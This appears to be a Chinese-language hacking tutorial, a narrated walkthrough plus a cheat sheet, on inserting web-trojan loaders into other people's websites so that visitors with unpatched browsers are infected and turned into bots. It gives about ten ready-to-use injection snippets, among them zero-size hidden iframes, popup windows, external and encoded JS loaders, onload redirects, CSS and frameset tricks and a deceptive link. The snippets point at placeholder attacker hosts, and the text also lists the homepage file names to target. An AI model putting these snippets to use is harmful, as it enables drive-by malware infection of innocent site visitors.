其實(shí)很簡單的的，說到原理，就一個：就是在人家網(wǎng)站的主頁那里插入一個自己的網(wǎng)馬的頁面，等有漏洞的人查看了人家網(wǎng)站的主頁，那么他就成了你的肉雞了。
下面我介紹5種方法，我一個一個介紹
方法一：這個就是最簡單的了，只要你懂點(diǎn)html語言
把下面這段代碼插進(jìn)網(wǎng)頁中：
<iframe src="這里換成你的網(wǎng)馬的地址" width="0" height="0" frameborder="0"></iframe>
我來插入，理論上來說插到任何地方都行，只是不要把html語言給弄亂了就行
本來沒有插進(jìn)去的頁面就是這樣，不知道網(wǎng)易那里有沒有彈出的廣告了，好我們運(yùn)行，注意到網(wǎng)頁的左下角的網(wǎng)址變化
看到左下角了吧，那里在請求www.163.com，說明我們插入進(jìn)去的頁面也運(yùn)行了，哦，還有個彈出的窗口，給我的工具攔了，我來刷新一次，看到吧
width="0" height="0" frameborder="0"就是大小高度的意思，我們把他設(shè)置為零，那我們就不能看到網(wǎng)頁的內(nèi)容了
看下一種方法，把原來插進(jìn)去的清理掉先，等下那個文件還要用
方法二：這個就是腳本
<SCRIPT language=javascript>
window.open("http://www.xxx.com/test.htm","","toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,width=1,height=1");
</script>
我們做網(wǎng)頁的時候就會加入很多網(wǎng)頁特效，同樣我們也可以用來打開我們的網(wǎng)馬，那么瀏覽過機(jī)子就會中我們的網(wǎng)馬了～
學(xué)過java的都知道上面一段代碼的意思了把！打開網(wǎng)站的同時也就打開了我們的http://www.xx.com/test.htm
看我們插進(jìn)去
彈出的窗口給攔了，我去掉先，還是給攔了
暈，有個窗口彈了出來，這樣子的網(wǎng)馬是不保險的……不過也不失為一種方法
呃～改成0就更大的窗口了，好，方法而已，只是介紹，下一個
方法三：
還有一點(diǎn)就是比較隱蔽的那就是使用js文件
document.write("<iframe width='0' height='0' src='http://xxxxxxx.net/mm1.htm'></iframe>");
document.write("<iframe width='0' height='0' src='http://xxxxxxx.net/mm2.htm'></iframe>");
我們沒必要掛兩個網(wǎng)馬，就寫一個好了額
剛才寫錯位置了
保存為mm.js，然后在首頁里調(diào)用js腳本
<script language="javascript" src="</script'>http://xxxxxxx.net/mm.js"></script>這個就是調(diào)用的代碼，從這里我們可以看到http://xxxxxxx.net/mm.js，說明我們的mm.js文件可以不傳到主機(jī)上，這樣可以方便我們批量管理我們掛馬，傳到我們的主頁空間上就可以了不過我這里就不傳了，就用本地的吧，運(yùn)行
左下角……調(diào)用了163的了，再刷新下，看清楚點(diǎn)，OK下一種方法
方法五：
再一種代碼就是調(diào)用其他網(wǎng)頁的頁面文件,可以將下面的代碼復(fù)制，保存為HTM文件。
<frameset rows="444,0" cols="*">
<frame src="/index.htm" framborder="no" scrolling="auto" noresize marginwidth="0" margingheight="0">
<frame src="help.htm" frameborder="no" scrolling="no" noresize marginwidth="0" margingheight="0">
</frameset>
打開這個網(wǎng)頁文件時顯示的是index.htm的內(nèi)容，而實(shí)際上還同時執(zhí)行了help.htm的代碼，大家可以對應(yīng)
自己生成的木馬頁和想調(diào)用的網(wǎng)頁來修改help.htm和index.htm，把它們改成你的文件名就可以了。
這個方法以前黑防的文章有，我就直講運(yùn)用了
我改代碼換成其他的頁面了，還是要注意頁面的左下角，出錯了，重來
看到左下角了吧，再刷新一次
看到了吧，只是太快就沒了
再說下我們掛馬的時候一般選取的頁面
我們選取用來插馬的頁面一般是網(wǎng)站的首頁
比如：index.htm、index.html、index.asp、index.aspx、index.php、index.cgi、index.jsp、default.htm、default.html default.asp default.aspx default.cgi default.jsp default.php等等，大家就自己記錄下來吧，其他頁面也可以插入，只要人家沒有打上補(bǔ)丁
一:框架掛馬
<iframe src=地址 width=0 height=0></iframe>
二:js文件掛馬
首先將以下代碼
document.write("<iframe width='0' height='0' src='地址'></iframe>");
保存為xxx.js，
則JS掛馬代碼為
<script language=javascript src=xxx.js></script>
三:js變形加密
<SCRIPT language="JScript.Encode" src=http://www.xxx.com/muma.txt></script>
muma.txt可改成任意后綴
四:body掛馬
<body onload="window.location='地址';"></body>
五:隱蔽掛馬
top.document.body.innerHTML = top.document.body.innerHTML + '\r\n<iframe src="http://www.xxx.com/muma.htm/"></iframe>';
六:css中掛馬
body {
background-image: url('javascript:document.write("<script src=http://www.XXX.net/muma.js></script>")')}
七:JAJA掛馬
<SCRIPT language=javascript>
window.open ("地址","","toolbar=no,location=no,directories=no,status=no,menubar=no,scro llbars=no,width=1,height=1");
</script>
八:圖片偽裝
<html>
<iframe src="網(wǎng)馬地址" height=0 width=0></iframe>
<img src="圖片地址"></center>
</html>
九:偽裝調(diào)用：
<frameset rows="444,0" cols="*">
<frame src="打開網(wǎng)頁" framborder="no" scrolling="auto" noresize marginwidth="0"margingheight="0">
<frame src="網(wǎng)馬地址" frameborder="no" scrolling="no" noresize marginwidth="0"margingheight="0">
</frameset>
十:高級欺騙
<a href="http://www.163.com(迷惑連接地址，顯示這個地址指向木馬地址)" onMouseOver="www_163_com(); return true;"> 頁面要顯示的內(nèi)容 </a>
<SCRIPT Language="JavaScript">
function www_163_com ()
{
var url="網(wǎng)馬地址";
open(url,"NewWindow","toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,resizable=no,copyhistory=yes,width=800,height=600,left=10,top=10");
}
</SCRIPT>

最新評論